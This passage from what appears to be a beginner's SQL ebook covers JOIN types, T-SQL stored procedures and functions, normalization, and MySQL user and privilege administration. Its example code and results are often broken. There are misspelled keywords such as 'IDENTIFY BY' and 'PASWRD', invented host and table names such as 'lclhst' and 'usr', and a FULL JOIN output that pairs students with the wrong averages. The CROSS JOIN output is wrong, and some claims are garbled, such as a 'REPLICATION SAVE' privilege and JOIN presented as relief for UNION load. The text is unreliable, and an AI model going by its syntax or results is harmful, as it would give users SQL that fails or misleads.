data. Without the key word “ALL”, duplicate data would automatically be
deleted.
Example: SELECT “column_name”, “column_name” FROM “table_name”
UNION ALL SELECT “column_name”, “column_name” FROM
“table_name”;
Combining tables with the SQL statement SELECT and JOIN
When your database server cannot handle the heavy load of your SELECT
UNION query, you could also use the keyword JOIN.
The same steps apply for these statements. Add the appropriate JOIN
keyword.
There are many types of JOIN SQL queries. These are:

INNER JOIN (SIMPLE JOIN) – This will return or retrieve


all data from tables that are joined. However, columns will not
be displayed when one of the joined tables has no data.
Example: SELECT “column1”, “column2” FROM “table_name1”
INNER JOIN “table_name2”
ON “table_name1”.column” = “table_name2.column”;
Let’s say you have these two tables:
Table A
Students
StudentNo LastName FirstName Age Address City
1 Potter Michael 17 130 Reed Cheyenne
Ave.
2 Walker Jean 18 110 Cody
Westlake
3 Anderson Ted 18 22 Staten Laramie
Sq.
4 Dixon Allan 18 12 Glenn Casper
Rd.
5 Cruise Timothy 19 20 Reed Cheyenne
Ave.

Table B
StudentInformation
StudentNo Year Average
1 1st 90
2 1st 87
3 3rd 88
4 5th 77
5 2nd 93

You may want to extract specified data from both tables. Let’s say from table
A, you want to display LastName, FirstName and the City, while from Table
B, you want to display the Average.
You can construct your SQL statement this way:
Example:
SELECT Students.LastName, Students.FirstName,
StudentInformation.Average
FROM Students
INNER JOIN StudentInformation ON Students.StudentNo=
StudentInformation.StudentNo;
This SQL query will display these data on your resulting table:
LastName FirstName Average
Potter Michael 90
Walker Jean 87
Anderson Ted 88
Dixon Allan 77
Cruise Timothy 93

LEFT OUTER JOIN (LEFT JOIN) – This SQL statement


will display all rows from the left hand table (table 1), even if
these do not match with the right hand table (table 2).
With the ON key word, it will display only the rows specified. Data from the
other table will only be displayed, if the data intersect with the first selected
table.
Example: SELECT “column1”, “column2” from “table_name1”
LEFT (OUTER) JOIN “table_name2”
ON “table_name1”.column” = “table_name2.column”;
Let’s use the two base tables above and create LEFT JOIN with the tables to
display the LastName and the Year. You can create your SQL statement this
way:
Example: SELECT students.LastName, StudentInformation.Year
FROM students
LEFT JOIN StudentInformation
ON Students.StudentNo = StudentInformation.StudentNo;

Your resulting table will appear this way:


LastName Year
Potter 1st
Walker 1st
Anderson 3rd
Dixon 5th
Cruise 2nd

RIGHT OUTER JOIN (RIGHT JOIN) – This query will


display all the rows from the right hand table (table 2). With
the ON key word added, just like with the LEFT JOIN, it will
display only the rows specified.
This SQL statement will display all data from table 2, even if there are no
matches from table 1 (left table). Take note that only the data from table 1
that intersect with table 2 will be displayed.
Example: SELECT “column1”, “column2” from “table_name1”
RIGHT (OUTER) JOIN “table_name2”
ON “table_name1”.column” = “table_name2.column”;
Let’s use the same base tables above, to facilitate viewing, the two base
tables are shown again on this page.
Table A
Students
StudentNo LastName FirstName Age Address City
1 Potter Michael 17 130 Reed Cheyenne
Ave.
2 Walker Jean 18 110 Cody
Westlake
3 Anderson Ted 18 22 Staten Laramie
Sq.
4 Dixon Allan 18 12 Glenn Casper
Rd.
5 Cruise Timothy 19 20 Reed Cheyenne
Ave.

Table B
StudentInformation
StudentNo Year Average
1 1st 90
2 1st 87
3 3rd 88
4 5th 77
5 2nd 93

And you want to perform a RIGHT OUTER JOIN or a RIGHT JOIN.


Here’s how you can state your SQL query.
Example: SELECT Students.City, StudentInformation.Average
FROM Students
RIGHT JOIN StudentInformation
ON students.StudentNo = StudentInformation.StudentNo
ORDER BY Students.City;
Your result-table will appear like this:
City Average
Cheyenne 90
Casper 77
Cheyenne 93
Cody 87
Laramie 88

FULL OUTER JOIN (FULL JOIN) – This SQL keyword


will display all the rows from both the left and right hand
tables.
All data should be displayed by a query using these keywords. Take note that
you should insert nulls when the conditions are not met in the joined tables
Example: SELECT “column1”, “column2” from “table_name1”
FULL (OUTER) JOIN “table_name2”
ON “table_name1”.”column” = “table_name2”.”column”;
Using the two base tables above, you can create your SQL FULL JOIN
statement this way:
Example: SELECT Students.LastName, StudentInformation.Average
FROM Students
FULL JOIN StudentInformation
ON students.StudentNo = StudentInformation.StudentNo
ORDER BY Students.LastName;
This will be your table output:
LastName Average
Potter 90
Anderson 93
Cruise 88
Dixon 87
Walker 77

There is no NULL VALUES in the columns because the column in both


tables matched.
CROSS JOIN – This SQL key word will display each row
from table1 that combined with each row from table2.
This is also called the CARTESIAN JOIN.
Example: SELECT * from [“table_name1”] CROSS JOIN [“table_name2”];
Using the two base tables above, we can create a SQL statement this way:
Example: SELECT * from Students CROSS JOIN StudentInformation;
The output-table will be this:
StudentNo LastName FirstName Age Address City Year
1 Potter Michael 17 130 Reed Cheyenne 1st
Ave.
2 Walker Jean 18 110 Cody 1st
Westlake
3 Anderson Ted 18 22 Staten Laramie 3rd
Sq.
4 Dixon Allan 18 12 Glenn Casper 5th
Rd.
5 Cruise Timothy 19 20 Reed Cheyenne 2nd
Ave.

Making use of this JOIN SQL syntax properly can save time and money. Use
them to your advantage.
Take note that when the WHERE clause is used, the CROSS JOIN becomes
an INNER JOIN.
There is also one way of expressing your CROSS JOIN. The SQL can be
created this way:
Example: SELECT LastName, FirstName, Age, Address, City
FROM Students
CROSS JOIN StudentInformation;
There will be slight variations in the SQL statements of other SQL servers,
but the main syntax is typically basic.
Chapter 13 Stored Procedures and Functions
So far, we have covered how to build queries as single executable lines.
However, you can place a number of lines into what is known as a stored
procedure or function within SQL Server and call them whenever it is
required.
There are a number of benefits to stored procedure and functions not just
code reuse including: better security, reduced development cost, consistent
and safe data, use of modularization and sharing application logic.
Stored procedures and functions are similar in that the both store and run
code but functions are executed within the context of another unit of work.

T-SQL

T-SQL or Transact Structure Query Language is an extension of the SQL


commands that have been executed thus far in this EBook. T-SQL offers a
number of extra features that are not available in SQL. These features
include local variables and programming elements which are used a lot in
stored procedures.

Creating a Stored Procedure

To create a stored procedure, you begin with the CREATE PROCEDURE


statement. After which you will have access to the (as mentioned) additional
programming commands in T-SQL. The following is the syntax for creating
a stored procedure:

CREATE PROCEDURE procedureName


[ { @parameterName} datatype [= default_value] [OUTPUT]]
WITH RECOMPILE, ENCRYPTION, EXECUTE AS Clause
AS
BEGIN
SELECT * FROM tableName1
END
It’s best practice to include a procedure name so it can be referenced later, it
is common to use the sp_ prefix.

Next thing to do is to define optional input and output parameter names.


Parameters are used to pass in information to a stored procedure. These are
prefixed by the @ symbol, must have a data type specified and you place
them in parentheses separate by commas. For example @customerID
varchar(50).

There are a number of different ways in which you can execute the query.
You can specify Recompile to indicate that the database engine doesn’t cache
this stored procedure so it must be recompiled every time its executed. You
can use the encryption keyword to hide the stored procedure so it’s not
readily readable. The EXECUTE AS Clause identifies the specific security
context under which the procedure will execute, i.e. control which user
account is used to validate the stored procedure.

After you declare the optional parameters you use the mandatory keyword
AS which defines the start of the T-SQL code and finishes with END. You
can use a stored procedure for more than just regular SQL statements like
SELECT, you can return a value which is useful for error checking.

Controlling the execution of the Stored Procedure


When you create a Stored Procedure often you need to control T-SQL in
between the BEGIN and END statements when dealing with more than one
T-SQL statement. You can use the following: IF ELSE, BEGIN END,
WHILE BREAK and CASE STATEMENT

IF ELSE

Often you will use statements in a Stored Procedure which you need a logical
true or false answer before you can proceed to the next statement. The IF
ELSE statement can facilitate. To test for a true or false statement you can
use the >, <, = and NOT along with testing variables. The syntax for the IF
ELSE statement is the following, note there is only one statement allowed
between each IF ELSE:
IF X=Y
Statement when True
ELSE
Statement when False

BEGIN END

If you need to execute more than one statement in the IF or ELSE block, then
you case use the BEGIN END statement. You can put together a series of
statements which will run after each other no matter what tested for previous
to it. The syntax for BEGIN END is the following:

IF X=Y
BEGIN
statement1
statement2
END

WHILE BREAK

When you need to perform a loop around a piece of code X number of times
you can use the WHILE BREAK statement. It will keep looping until you
either break the Boolean test condition or the code hits the BREAK
statement. The first WHILE statement will continue to execute as long as the
Boolean expression returns true. Once its False it triggers the break and the
next statement is executed. You can use the CONTINUE statement which is
optional, it moves the processing right back to the WHILE statement. The
syntax for the WHILE BREAK command is the following:

WHILE booleanExpression
SQL_statement1 | statementBlock1
BREAK
SQL_statement2 | statementBlock2
Continue
SQL_statement3 | statementBlock3

CASE

When you have to evaluate a number of conditions and a number of answers


you can use the CASE statement. The decision making is carried out with the
initial SELECT or an UPDATE statement. Then a CASE expression (not a
statement) is stated, after which you need to determine with a WHEN clause.
You can use a CASE statement as part of a SELECT, UPDATE or INSERT
statement.

There are two forms of CASE, you can use the simple form of CASE to
compare one value or scalar expression to a list of possible values and return
a value for the first match - or you can use the searched CASE form when
you need a more flexibility to specify a predicate or mini function as opposed
to an equality comparison. The following code illustrates the simple form:

SELECT column1
CASE expression
WHEN valueMatched THEN
statements to be executed
WHEN valueMatched THEN
statements to be executed
ELSE
statements to catch all other possibilities
END

The following code illustrate the more complex form, it is useful for
computing a value depending on the condition:
SELECT column1
CASE
WHEN valueX_is_matched THEN
resulting_expression1
WHEN valueY_is_matched THEN
resulting_ expression 2
WHEN valueZ_is_matched THEN
resulting_ expression 3
ELSE
statements to catch all other possibilities
END
The CASE statement works like so, each table row is put through each CASE
statement and instead of the column value being returned, the value from the
computation is returned instead.

Functions

As mentioned functions are similar to stored procedures but they differ in that
functions (or User Defined Functions UDF) can execute within another piece
of work – you can use them anywhere you would use a table or column.
They are like methods, small and quick to run. You simply pass it some
information and it returns a result. There are two types of functions, scalar
and table valued. The difference between the two is what you can return
from the function.

Scalar Functions

A scalar function can only return a single value of the type defined in the
RETURN clause. You can use scalar functions anywhere the scalar matches
the same data type as being used in the T-SQL statements. When calling
them, you can omit a number of the functions parameters. You need to
include a return statement if you want the function to complete and return
control to the calling code. The syntax for the scalar function is the
following:

CREATE FUNCTION schema_Name function_Name


-- Parameters
RETURNS dataType
AS
BEGIN
-- function code goes here
RETURN scalar_Expression
END

Table-Valued Functions

A table-valued function (TVF) lets you return a table of data rather than the
single value in a scalar function. You can use the table-valued function
anywhere you would normally use a table, usually from the FROM clause in
a query. With table-valued functions it is possible to create reusable code
framework in a database. The syntax of a TVF is the following

CREATE FUNCTION function_Name (@variableName


RETURNS TABLE
AS
RETURN
SELECT columnName1, columnName2
FROM Table1
WHERE columnName > @variableName

Notes on Functions

A function cannot alter any external resource like a table for example. A
function needs to be robust and if there is an error generate inside it either
from invalid data being passed or the logic then it will stop executing and
control will return to the T-SQL which called it.
Chapter 14 Relationships
A database relationship is a means of connecting two tables together based on
a logical link (i.e. they contain related data). Relationships facilitate database
queries to be executed on two or more tables and they also ensure data
integrity.
Types of relationships
There exists three major types in a database:

One is to One
One is to Many
Many is to Many
One is to One
This type of relationship is pretty rare in databases. A row in a given table X
can will have a matching row in another table Y. Equally a row in table Y
can only have a matching row in table X. An example of a one is to one
relationship is one person having one passport.
One is to Many
This is probably one of the most prevalent relationships found in databases.
A row in a given table X will have several other matching rows present in
another table Y, however a row in the same table Y will only have a single
row that it matches in table X. An example is Houses in a street. One street
had multiple houses and a house belongs to one street.
Many is to Many
A row in a given table X will possess several matching rows in another
specified table Y and the vice versa is also true. This type of relationship is
quite frequent where there are zero, one or even many records in the master
table related to zero, one or many records in the child table. An example of
this relationship is a school where teachers teach students. A teacher can
teach many students and each student can be taught by many teachers.
Referential Integrity
When two tables are connected in a database and have the same information,
it is necessary that the data in both the tables is kept consistent, i.e. either the
information in both tables change or neither table changes. This is known as
referential integrity. It is not possible to have referential integrity with tables
that are in separate databases.
When enforcing referential integrity, it isn’t possible to enter a record in a
(address) table which doesn’t exist in the other (customer) linked table (i.e.
the one with the primary key). You need to first create the customer table
and then use its details to create the address table.
Also, you can use what is known as a trigger and stored procedures to enforce
referential integrity as well as using relationships.
Chapter 15 Database Normalization
In this chapter you will learn an in-depth knowledge of normalization
techniques and their importance in enhancing database conceptualization and
design. As such, more efficient databases are created that will provide the
SQL software application an edge in performing effective queries and
maintaining data integrity all the time.
Definition and Importance of Database Normalization
Basically, normalization is the process of designing a database model to
reduce data redundancy by breaking large tables into smaller but more
manageable ones, where the same types of data are grouped together. What is
the importance of database normalization? Normalizing a database ensures
that pieces information stored are well organized, easily managed and always
accurate with no unnecessary duplication. Merging the data from the
CUSTOMER_TBL table with the ORDER_TBL table will result into a
large table that is not normalized:

If you look closely into this table, there is data redundancy on the part of the
customer named Kathy Ale. Always remember to minimize data redundancy
to save disk or storage space and prevent users from getting confused with
the amount of information the table contains. There is also a possibility that
for every table containing such customer information, one table may not have
the same matching information as with another. So how will a user verify
which one is correct? Also, if a certain customer information needs to be
updated, then you are required to update the data in all of the database tables
where it is included. This entails wastage of time and effort in managing the
entire database system.
Forms of Normalization
Normal form is the way of measuring the level to which a database has been
normalized and there are three common normal forms:
First Normal Form (1NF)
The first normal form or 1NF aims to divide a given set of data into logical
units or tables of related information. Each table will have an assigned
primary key, which is a specified column that uniquely identifies the table
rows. Every cell should have a single value and each row of a certain table
refers to a unique record of information. The columns that refer to the
attributes of the table information are given unique names and consist of the
same type of data values. Moreover, the columns and the rows are arranged is
no particular order.
Let us add a new table named Employee_TBL to the database that contains
basic information about the company’s employees:

Based from the diagram above, the entire company database was divided into
two tables – Employee_TBL and Customer_TBL. EmployeeID and
CustomerID are the primary keys set for these tables respectively. By doing
this, database information is easier to read and manage as compared to just
having one big table consisting of so many columns and rows. The data
values stored in Employee_TBL table only refer to the pieces of information
describing the company’s employees while those that pertain exclusively to
the company’s customers are contained in the Customer_TBL table.
Second Normal Form (2NF)
The second normal form or 2NF is the next step after you are successfully
done with the first normal form. This process now focuses on the functional
dependency of the database, which describes the relationships existing
between attributes. When there is an attribute that determines the value of
another, then a functional dependency exists between them. Thus, you will
store data values from the Employee_TBL and Customer_TBL tables,
which are partly dependent on the assigned primary keys, into separate tables.
In the figure above, the attributes that are partly dependent on the
EmployeeID primary key have been removed from Employee_TBL, and are
now stored in a new table called Employee_Salary_TBL. The attributes that
were kept in the original table are completely dependent on the table’s
primary key, which means for every record of last name, first name, address
and contract number there is a corresponding unique particular employee ID.
Unlike in the Employee_Salary_TBL table, a particular employee ID does
not point to a unique employee position nor salary rate. It is possible that
there could be more than one employee that holds the same position
(EmpPosition), and receives the same amount of pay rate (Payrate) or bonus
(Bonus).
Third Normal Form (3NF)
In the third normal form or 3NF, pieces of information that are completely
not dependent on the primary key should still be separated from the database
table. Looking back at the Customer_TBL, two attributes are totally
independent of the CustomerID primary key - JobPosition (job position)
and JobDescription (job position description). Regardless of who the
customer is, any job position will have the same duties and responsibilities.
Thus, the two attributes will be separated into another table called
Position_TBL.
Drawbacks of Normalization
Though database normalization has presented a number of advantages in
organizing, simplifying and maintaining the integrity of databases, you still
need to consider the following disadvantages:

Creating more tables to spread out data increases the


need to join tables and such task becomes more tedious, which
makes the database harder to conceptualize.
Instead of real and meaningful data, database tables
will contain lines of codes.
Query processes becomes extremely difficult since
the database model is getting too complex.
Database performance is reduced or becomes slower
as the normal form type progresses.
A normalized database requires much more CPU and
memory usage.
To execute the normalization process efficiently, the
user needs the appropriate knowledge and skills in optimizing
databases. Otherwise, the design will be filled with
inconsistencies.
Chapter 16 Database Security and Administration
MySQL has an integrated advanced access control and privilege system that
enables generation of extensive access guidelines for user activities and
efficiently prevent unauthorized users from getting access to the database
system.
There are 2 phases in MySQL access control system for when a user
is connected to the server:

Connection verification: Every user is required to have valid


username and password, that is connected to the server.
Moreover, the host used by the user to connect must be the
same as the one used in the MySQL grant table.
Request verification: After a link has been effectively
created for every query executed by the user, MySQL
will verify if the user has required privileges to run that`
specific query. MySQL is capable of checking user privileges
at database, table, and field level.
The MySQL installer will automatically generate a database called mysql.
The mysql database is comprised of 5 main grant tables. Using GRANT and
REVOKE statements like, these tables can be indirectly manipulated.

User: This includes columns for user accounts and global


privileges. MySQL either accepts or rejects a connection from
the host using these user tables. A privilege given under the
user table is applicable to all the databases on the server.
Database: This comprises of db level privilege. MySQL
utilizes the “db_table” to assess the database that can be used
by a user to access and to host the connection. These privileges
are applicable to the particular database and all the
object available in that database, such as stored procedures,
views, triggers, tables, and many more.
“Table_priv” and “columns_priv”: This includes privileges
at the level of column and table. A privilege given in the "table
priv" table is applicable only to that columns of that particular
table, on the other hand privileges given in the "columns
priv" table is applicable only to that particular column.
“Procs_priv”: This includes privileges for saved functions and
processes.
MySQL uses the tables listed above to regulate MySQL database server
privileges. It is extremely essential to understand these tables before
implementing your own dynamic access control system.
Creating User Accounts
In MySQL you can indicate that the user has been privileged to connect to
the database server as well as the host to be used by the user to build that
connection. As a result, for every user account a username and a host name in
MySQL is generated and divided by the @ character.
For instance, if an admin user is connected from a localhost to the server, the
user account will be named as “admin@localhost.” However, the
“admin_user” is allowed to connect only to the server using a "localhost" or a
remote host, which ensures that the server has higher security.
Moreover, by merging the username and host, various accounts with the same
name can be configured and still possess the ability to connect from distinct
hosts while being given distinct privileges, as needed.
In the mysql database all the user accounts are stored in the "user grant"
table.
Using MySQL CREATE USER Statement
The “CREATE USER”is utilized with the MySQL server to setup new user
accounts, as shown in the syntax below:
CREATE USER usr_acnt IDENTIFY BY paswrd;
In the syntax above, the CREATE USER clause is accompanied by the name
of the user account in username @ hostname format.
In the "IDENTIFIED BY" clause, the user password would be indicated. It is
important that the password is specified in plain text. Prior to the user
account being saved in the user table, MySQL is required for encryption of
the user passwords.
For instance, these statements can be utilized as given below, for creating a
new "user dbadmin,” that is connected to the server from local host using
user password as Safe.
CREATE USER dbadmn@lclhst
IDENTIFY BY 'Safe';
If you would like to check the permissions given to any user account, you can
run the syntax below:
SHOW GRANTS FOR dbadmn@localhst and dbadmn2@localhst2;
"+-------------------------------------+
| Grnts todbadmin@localhost|
+--------------------------------------+
| GRANT USAGE ON *.* TO ‘dbadmn’ @ ‘localhst’ |
+--------------------------------------+
| GRANT USAGE ON *.* TO ‘dbadmn2’ @ ‘localhst2’ |
+--------------------------------------+
2 rows in set (0.20 secs)"
The *. * in the output above indicates that the dbadmn and dbadmn2 users are
allowed to log into the server only and do not have any other
access privileges.
Bear in mind that the portion prior to the dot (.) is representing the db and the
portion following the dot is representing the table, for example, db.tab.
The percentage (%) wildcard can be used as shown in the syntax below
for allowing a user to create a connection from any host:
CREATE USER supradmn@'%'
IDENTIFY BY 'safe';
The percentage (%) wildcard will lead to identical result as when included in
the “LIKE” operator, for example, to enable msqladmn user account to link to
the server from any “subdomain” of the mysqhost.something host, this can be
used as shown in the syntax below:
CREATE USER ‘msqladmn@' % ‘mysqhost.something'
IDENTIFT by 'safe';"
It should also be noted here, that another wildcard underscore (_) can be used
in the CREATE USER statement.
If the host name portion can be omitted from the user accounts, server will
recognize them and enable the users to get connected from other hosts. For
instance, the syntax below will generate a new remote user account that
allows creation of a connection to from random hosts:
CREATE USER remoteuser;
To view the privileges given to the remoteuser and remoteuser2 account, you
can use the syntax below:
SHOW GRANTS FOR remoteuser, remoteuser2;
+---------------------------------------+
| Grnts for remoteuser@% |
+---------------------------------------+
| GRANT USAGE ON *.* TO ‘remoteuser’ @ ‘%’ |
+---------------------------------------+
| GRANT USAGE ON *.* TO ‘remoteuser2’ @ ‘%’ |
+------------------------------------+
2 rows in set (0.30 secs)"
It is necessary to remember that the single quotation (' ') in the syntax above
is particularly significant, if the user accounts have special characters
like underscore or percentage.
If you inadvertently cite the user account as usrname@hstname, the server
will create new user with the name as usrname@hstname and enables it to
start a connection from random hosts, that cannot be anticipated.
The syntax below, for instance, can be used to generate a new
accountapi@lclhst that could be connected to the server from random hosts.
CREATE USER 'api@lclhst';
SHOW GRANTS FOR 'api@lclhst';
+---------------------------------------+
| Grnts for api@lclhst@% |
+-------------------------------------------+
| GRANT USAGE ON *.* TO ‘api@lclhst’ @ ‘%’ |
+----------------------------------------+
1 row(s) in set (0.01 sec)
If you accidentally generate a user that has already been created in the
database, then an error will be issued by MySQL. For instance, the syntax
below can be used to generate a new user account called remoteuser:
CREATE USER remoteuser;
The error message below will be displayed on your screen:
ERROR 1398 (HY0000): Action CREATE USER fails for 'remoteuser'@ '%'
It can be noted that the "CREATE USER" statement will only create the
new user but not grant any privileges. The GRANT statement can be utilized
to give access privileges to the users.
Updating USER PASSWORD
Prior to altering a MySQL user account password, the concerns listed below
should be taken into consideration:

The user account whose password you would like to be


modified.
The applications that are being used with the user account for
which you would like to modify the password. If the password
is changed without altering the application connection string
being used with that user account, then it would be not feasible
for those applications to get connected with the database
server.
MySQL offers a variety of statements that can be used to alter a user's
password, such as UPDATE, SET PASSWORD, and GRANT
USAGE statements.
Let’s explore some of these syntaxes!
Using UPDATE Statement
The UPDATE can be utilized to make updates to the user tables in the
database. You must also execute the “FLUSH PRIVILEGES” statements to
refresh privileges from the “grant table,” by executing the
UPDATE statement.
Assume that you would like to modify the password for the dbadmn user,
which links from the local host to the fish. It can be accomplished by
executing the query below:
USE msql;
UPDATE usr
SET paswrd = PASWRD ('fish')
WHERE usr = 'dbadmn' AND
host = 'lclhst';
FLUSH PRIVILEGES;
Using SET PASSWORD Statement
For updating the user password, the user@host format is utilized. Now,
imagine that you would like to modify the password for some other
user's account, then you will be required to have the UPDATE privilege on
your user account.
With the use of the SET PASSOWORD statement, the FLUSH
PRIVILEGES statement is not required to be executed, in order to reload
privileges to the mysql database from the grant tables.
The syntax below could be utilized to alter the dbadmn user account
password:
SET PASSWORD FOR 'dbadmn'@ 'lclhst' = PASSWORD('bigfish');
Using ALTER USER Statement
Another method to update the user password is with the use of the ALTER
USER statements with the “IDENTIFIED BY” clause. For instance, the
query below can be executed to change the password of the dbadmn user to
littlefish.
ALTER USER dbadmn@lclhst IDENTIFY BY 'littlefish';
***USEFUL TIP***
If you need to change the password of the “root account,” then the server
must be force quit and started back up without triggering the grant table
validation.
Granting User Privileges
As a new user account is created, there are no access privileges afforded to
the user by default. The "GRANT" statement must be used in order for
granting privileges to all user accounts. The syntax of these statements are
shown below:
GRANT priv,[priv], .... ON priv_level
TO usr [IDENTIFIED BY pswrd]
[REQUIRE tssl_optn]
[WITH [GRANT_OPTION | resrce_optn]];

In the syntax above, we start by specifying one or more


privileges following the GRANT clause. Every privilege being
granted to the user account must be isolated using a comma, in
case you would like to give the user account more than one
privilege at the same time. (The list of potential privileges that
may be granted to a user account is given in the table below).
After that you must indicate the "privilege_level" that
will determine the levels at which the privilege is applied. The
privilege level supported by MySQL are "global (*. *),”
"database (database. *),” "table (database.table)" and
"column" levels.
Next you need to indicate the user that needs to be granted
the privileges. If the indicated user can be found on the
server, then the GRANT statement will modify its privilege. Or
else, a new user account will be created by the
GRANT statement. The IDENTIFIED BY clause is not
mandatory and enables creation of a new password for the user.
Thereafter, it's indicated if the user needs to start a connection
to the database via secured connections.
At last, the "WITH GRANT OPTION" clause is added which
is not mandatory but enables granting and revoking the
privileges of other user, that were given to your own account.
Moreover, the WITH clause can also be used to assign
the resources from the MySQL database server, for example,
putting a limit on the number of links or statements that can be
used by the user per hour. In shared environments like MySQL
shared hosting, the WITH clause is extremely useful.
Note that the GRANT OPTION privilege as well as the privileges you are
looking to grant to other users must already be configured to your own user
account, so that you are able to use the GRANT statement. If the read only
system variable has been allowed, then execution of the GRANT statement
requires the SUPER privilege.
PRIVILEGE DESCRIPTION LEVEL LEVEL LEVEL LEVEL
Global Database Table Column
“ALL” Granting all of
the privileges at
specific access
levels except the
GRANT
OPTION.
“ALTER” Allowing users Y Y Y
the usage of
ALTER TABLE
statement.
“ALTER Allowing users Y Y
ROUTINE” to alter and drop
saved routines.
“CREATE” Allowing users Y Y Y
to generate
databases and
tables.
“CREATE Allowing users Y Y
ROUTINE” to create saved
routines.
“CREATE Allowing users Y
TABLESPACE” to generate,
modify or
remove tables
and log file
groups.
“CREATE Allowing users Y Y
TEMPORARY to generate temp
TABLES” tables with the
use of the
CREATE
TEMPORARY
TABLE.
“CREATE Allowing users Y
USER” to utilize the
CREATE,
DROP,
RENAME any
USER, and
REVOKE ALL
PRIVILEGES
statements.
“CREATE Allowing users Y Y Y
VIEW” to generate or
update views.
“DELETE” Allowing users Y Y Y
to utilize the
DELETE
keyword.
“DROP” Allowing users Y Y Y
to remove
databases, tables
and views.
“EVENT” Enabling the Y Y
usage of events
for the Event
Scheduler.
“EXECUTE” Allowing users Y Y Y
for execution of
saved routines.
“FILE” Allowing users Y
to read the files
in the db
directories.
“GRANT Allowing users Y Y Y
OPTION” privilege for
granting or
revoking
privileges from
other users.
“INDEX” Allowing users Y Y Y
to generate or
drop indexes.
“INSERT” Allowing users Y Y Y Y
the usage of
INSERT
statements.
“LOCK Allowing users Y Y
TABLES” the usage of
LOCK TABLES
on tables that
have the
SELECT
privileges.
“PROCESS” Allowing users Y
to view all
processes with
SHOW
PROCESSLIST
statements.
“PROXY” Enabling
creation of proxy
of the users.
REFERENCES Allowing users Y Y Y Y
to generate
foreign key.
“RELOAD” Allowing users Y
the usage of the
FLUSH
operation.
“REPLICATION Allowing users Y
CLIENT” to query to see
where master or
slave servers are.
“REPLICATION Allowing the Y
SAVE” users to use
replicated slaves
to read binary
log events from
the master.
“SELECT” Allowing users Y Y Y Y
the usage of
SELECT
statements.
“SHOW Allowing users Y
DATABASES” to view all
databases.
“SHOW VIEW” Allowing users Y Y Y
to utilize SHOW
CREATE VIEW
statement.
“SHUTDOWN” Allowing users Y
to use
mysqladmin
shutdown
commands.
“SUPER” Allowing users Y
to utilize other
administrative
operations like
CHANGE
MASTER TO,
KILL, PURGE
BINARY LOGS,
SET GLOBAL,
and mysqladmin
commands.
“TRIGGER” Allowing users Y Y Y
the usage of
TRIGGER
operations.
“UPDATE” Allowing users Y Y Y Y
the usage of
UPDATE
statements.
“USAGE” Equivalent to no
privilege.

EXAMPLE
More often than not, the CREATE USER statement will be used to first
create a new user account and then the GRANT statement is used to assign
the user privileges.
For instance, a new super user account can be created by the executing the
CREATE USER statement given below:
CREATE USER super@localhost IDENTIFIED BY 'dolphin';
In order to check the privileges granted to the super@localhost user, the
query below with SHOW GRANTS statement can be used.
SHOW GRANTS FOR super@localhost;
+-------------------------------------------+
| Grants for super@localhost |
+-------------------------------------------+
| GRANT USAGE ON *.* TO `super`@`localhost` |
+-------------------------------------------+
1 row in set (0.00 sec)
Now, if you wanted to assign all privileges to the super@localhost user, the
query below with GRANT ALL statement can be used.
GRANT ALL ON *.* TO 'super'@'localhost' WITH GRANT OPTION;
The ON*. * clause refers to all databases and items within those databases.
The WITH GRANT OPTION enables super@localhost to assign privileges
to other user accounts.
If the SHOW GRANTS statement is used again at this point then it can be
seen that privileges of the super@localhost's user have been modified, as
shown in the syntax and the result set below:
SHOW GRANTS FOR super@localhost;
+----------------------------------------------------------------------+
| Grants for super@localhost |
+----------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO `super`@`localhost` WITH GRANT
OPTION |
+----------------------------------------------------------------------+
1 row in set (0.00 sec)
Now, assume that you want to create a new user account with all the server
privileges in the classicmodels sample database. You can accomplish this by
using the query below:
CREATE USER auditor@localhost IDENTIFIED BY 'whale';
GRANT ALL ON classicmodels.* TO auditor@localhost;
Using only one GRANT statement, various privileges can be granted to a
user account. For instance, to generate a user account with the privilege
of executing SELECT, INSERT and UPDATE statements against the
database classicmodels, the query below can be used.
CREATE USER rfc IDENTIFIED BY 'shark';
GRANT SELECT, UPDATE, DELETE ON classicmodels.* TO rfc;

Revoking User Privileges


You will be using the statement MySQL REVOKE to revoke any of
the privileges of any user account(s). MySQL enables withdrawal of one or
more privileges or even all of the previously granted privileges of a user
account.
The query below can be used to revoke particular privileges from a user
account:
REVOKE privilege_type [(column_list)]
[, priv_type [(column_list)]]...
ON [object_type] privilege_level
FROM user [, user]...
In the syntax above, we start by specifying a list of all the privileges that need
to be revoked from a user account next to REVOKE keyword. You might
recall when listing multiple privileges in a statement they must be separated
by commas. Then we indicate the level of the privilege at which the
ON clause will be revoking these privileges. Lastly we indicate the user
account whose privileges will be revoked in the specified FROM clause.
Bear in mind that your own user account must have the GRANT
OPTION privilege as well as the privileges you want to revoke from
other user accounts.
You will be using the REVOKE statement as shown in the syntax below, if
you are looking to withdraw all privileges of a user account:
REVOKE ALL PRIVILEGES, GRANT OPTION FROM user [, user]…
It is important to remember that you are required to have the CREATE USER
or the UPDATE privilege at global level for any given mysql database, to be
able to execute the REVOKE ALL statement.
You will be using REVOKE PROXY clause as shown in the query below, in
order to revoke proxy users:
REVOKE PROXY ON user FROM user [, user]...
You define a proxy user as a validated user within any MySQL environment
who has the capabilities of impersonating another user. As a result, the proxy
user is able to attain all the privileges granted to the user that it
is impersonating.
The best practice dictates that you should first check what privileges have
been assigned to the user by executing the syntax below with the statement
SHOW GRANTS, prior to withdrawing the user's privileges:
SHOW GRANTS FOR user;
EXAMPLE
Assume that there is a user named rfd with SELECT, UPDATE and DELETE
privileges on the classicmodels sample database and you would like to revoke
the UPDATE and DELETE privileges from the rfd user. To accomplish this,
you can execute the queries below.
To start with we will check the user privileges using the SHOW GRANTS
statement below:
SHOW GRANTS FOR rfd;
GRANT SELECT, UPDATE, DELETE ON 'classicmodels'.* TO 'rfc'@'%'
At this point, the UPDATE and REVOKE privileges can be revoked from the
rfd user, using the query below:
REVOKE UPDATE, DELETE ON classicmodels.* FROM rfd;
Next, the privileges of the rfd user can be checked with the use of SHOW
GRANTS statement.
SHOW GRANTS FOR 'rfd'@'localhost';
GRANT SELECT ON 'classicmodels'.* TO 'rfd'@'%'
Now, if you wanted to revoke all the privileges from the rfd user, you can use
the query below:
REVOKE ALL PRIVILEGES, GRANT OPTION FROM rfd;
To verify that all the privileges from the rfd user have been revoked, you will
need to use the query below:
SHOW GRANTS FOR rfd;
GRANT USAGE ON *.* TO 'rfd'@'%'
Remember, the USAGE privilege simply means that the user has no
privileges in the server.
Resulting Impact of the REVOKE Auery
The impact of MySQL REVOKE statement relies primarily on the level of
privilege granted to the user account, as explained below:
The modifications made to the global privileges will only take
effect once the user has connected to the MySQL server in
a successive session, post the successful execution of the
